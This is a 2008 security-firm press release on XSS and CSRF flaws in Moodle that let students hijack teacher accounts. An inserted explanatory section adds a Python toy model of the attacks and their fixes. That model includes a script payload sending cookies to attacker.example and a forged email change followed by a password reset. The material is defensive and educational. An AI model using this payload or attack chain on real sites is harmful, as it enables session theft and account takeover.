Press Releases
Monday, 14 July 2008: Teachers beware: students have the potential to compromise the site and change grades.
London, UK – 14th July 2008
Moodle, a leading product in the academic portals arena, used by world-class universities and other academic institutions, is vulnerable to the takeover of teacher accounts. The vulnerabilities would allow the perpetrator to manage the account and gain access to higher-privileged functions such as grade tracking (viewing and changing grades) and retrieval of exams and assignments submitted by other students.
Adrian Pastor and Amir Azam of ProCheckUp Ltd have found two serious vulnerabilities that allow malicious users to take over accounts. By simply tricking a teacher into clicking on a link while logged on to a Moodle site, the teacher's account can be hijacked by a malicious user (e.g. a disgruntled student).
Amir Azam of ProCheckUp said: “Once a malicious user identifies the administrator’s account and tricks him into clicking on a malicious link, the attacker is only limited by his own imagination…”
Since Moodle sites provide so many user-interaction capabilities (e.g. blogs, chats, public profiles), it is very realistic to assume that a teacher could be tricked into clicking on a link posted by a malicious student on the Moodle site itself.
The two serious vulnerabilities in question are persistent XSS (Cross-site Scripting) and CSRF (Cross-site Request Forgery). Both were successfully exploited by Adrian and Amir during a penetration test in order to compromise teacher accounts.
In the persistent XSS demo exploit provided by ProCheckUp, user accounts are hijacked by injecting a piece of JavaScript code into the public blogs section. The injected code forwards the session ID of every user who views the blogs section to the attacker, who can then use any of those session IDs to log in as the corresponding user.
In the CSRF demo exploit, the “edit profile” request is forged when the victim clicks on the malicious link: the victim's browser sends the request with the victim's own session, and the forged request changes the victim's email address to the attacker's. Once that change is made, the attacker goes to the Moodle site and requests a new password (the “lost password?” link) for his own email address. At this point the victim's account is hijacked: the attacker can log in to the victim's account with the newly issued password.
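The two chains described above, modelled end to end as an added illustration. This is not Moodle code and not ProCheckUp's exploit: the class, method and token names (Site, edit_profile, lost_password, sesskey), the user accounts and the attacker host are all invented for this example. The same toy site is run once without protections, so both chains succeed, and once with a per-session anti-CSRF token on the profile edit and HTML escaping of blog output, so both fail.

```python
"""Toy model of the stored-XSS and CSRF account-takeover chains.

Added example, not Moodle code. Names (Site, edit_profile, lost_password,
sesskey), accounts and the attacker host are constructed for illustration.
"""
import html
import hmac
import secrets


class Site:
    """Stand-in for a web app with sessions, a public blog, an "edit profile"
    action and a "lost password?" flow that mails a fresh password."""

    def __init__(self, csrf_protected: bool, escape_output: bool):
        self.csrf_protected = csrf_protected
        self.escape_output = escape_output
        self.users = {}      # username -> {"email": ..., "password": ...}
        self.sessions = {}   # session id -> username
        self.sesskeys = {}   # session id -> per-session anti-CSRF token
        self.blog = []       # blog posts exactly as submitted
        self.outbox = []     # (recipient email, new password) "sent" by mail

    def register(self, username, email, password):
        self.users[username] = {"email": email, "password": password}

    def login(self, username, password):
        u = self.users.get(username)
        if u is None or not hmac.compare_digest(u["password"], password):
            return None
        sid = secrets.token_hex(16)
        self.sessions[sid] = username
        self.sesskeys[sid] = secrets.token_hex(16)
        return sid

    def edit_profile(self, session_id, new_email, sesskey=None):
        """The request a CSRF link forges. The attacker's page can make the
        victim's browser send it (the session cookie is attached automatically)
        but cannot read the victim's sesskey, so checking it defeats the forgery."""
        username = self.sessions.get(session_id)
        if username is None:
            return False
        if self.csrf_protected:
            expected = self.sesskeys[session_id]
            if sesskey is None or not hmac.compare_digest(expected, sesskey):
                return False
        self.users[username]["email"] = new_email
        return True

    def lost_password(self, email):
        """'lost password?' link: mail a fresh password to the address on file."""
        for u in self.users.values():
            if u["email"] == email:
                u["password"] = secrets.token_urlsafe(12)
                self.outbox.append((email, u["password"]))
                return True
        return False

    def post_blog(self, session_id, text):
        if session_id in self.sessions:
            self.blog.append(text)

    def render_blog(self):
        """Public blog page. Unescaped, a stored <script> runs in every visitor's
        browser; with html.escape it is displayed as inert text."""
        posts = (html.escape(t) if self.escape_output else t for t in self.blog)
        return "<html><body>" + "".join(f"<p>{p}</p>" for p in posts) + "</body></html>"


# Constructed payload: sends the viewer's cookies to an attacker-controlled host.
XSS_PAYLOAD = "<script>new Image().src='http://attacker.example/?c='+document.cookie</script>"


def csrf_takeover(site):
    """Teacher clicks link -> email forged -> password reset -> attacker logs in.
    Returns True if the attacker ends up with a session as the teacher."""
    site.register("teacher", "teacher@school.example", "correct horse")
    teacher_sid = site.login("teacher", "correct horse")
    # The forged request rides on the teacher's session but carries no sesskey,
    # because the attacker never saw it.
    site.edit_profile(teacher_sid, "attacker@evil.example")
    site.lost_password("attacker@evil.example")
    for recipient, new_password in site.outbox:
        if recipient == "attacker@evil.example":
            return site.login("teacher", new_password) is not None
    return False


def stored_xss_rendered(site):
    """A student posts the payload; return the HTML every later visitor receives."""
    site.register("student", "student@school.example", "pw")
    sid = site.login("student", "pw")
    site.post_blog(sid, XSS_PAYLOAD)
    return site.render_blog()


if __name__ == "__main__":
    print("CSRF chain, no sesskey check:", csrf_takeover(Site(False, False)))
    print("CSRF chain, sesskey check:   ", csrf_takeover(Site(True, True)))
    print("<script> served, no escaping:", "<script>" in stored_xss_rendered(Site(False, False)))
    print("<script> served, escaped:    ", "<script>" in stored_xss_rendered(Site(True, True)))
```

The two checks that break the chains are independent: the sesskey comparison on the profile edit stops the forged request regardless of how the victim was lured, and escaping blog output stops the stored script from ever reaching a browser; a practitioner would add both, plus marking the session cookie HttpOnly so that even a script that does run cannot read the session ID.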
Although the exploits were tested only against teacher accounts and not against administrator accounts, they are suspected to work against administrator accounts as well.
Note: Moodle sites usually have four types of user account: guest, student, teacher and administrator. Compromising an administrator account would lead to a total compromise of the Moodle site.
About ProCheckUp
A leading independent specialist security organisation, ProCheckUp was formed in 2000 to provide a unique Artificial Intelligence (AI) based penetration testing service to the corporate market.
Since then the company has enjoyed significant commercial and technological success, and received Royal recognition in April 2004 by winning the prestigious Queen's Award for Enterprise: Innovation, the UK's highest accolade for business performance.
ProCheckUp are service providers to some of the world's leading finance and banking organisations, international law firms and FTSE 100 companies.
About ProCheckNet
ProCheckUp has adopted the methodology of conventional penetration testing and combined it with the functionality of a distributed automated attack system called ProCheckNet.
ProCheckNet automates the complex processes and decision making associated with a manual penetration testing team. It builds customised exploits in an entirely safe manner to achieve a level of testing unrivalled by conventional approaches. Complemented with features such as real-time encapsulated exploits and firewall and IDS bypass, ProCheckNet is a revolutionary attack system. Companies that require the highest level of security assurance utilise ProCheckNet to test all their internal and externally facing IT infrastructure, including brochureware, e-commerce websites, RAS, VPNs, mail services, DNS and even entirely bespoke applications.
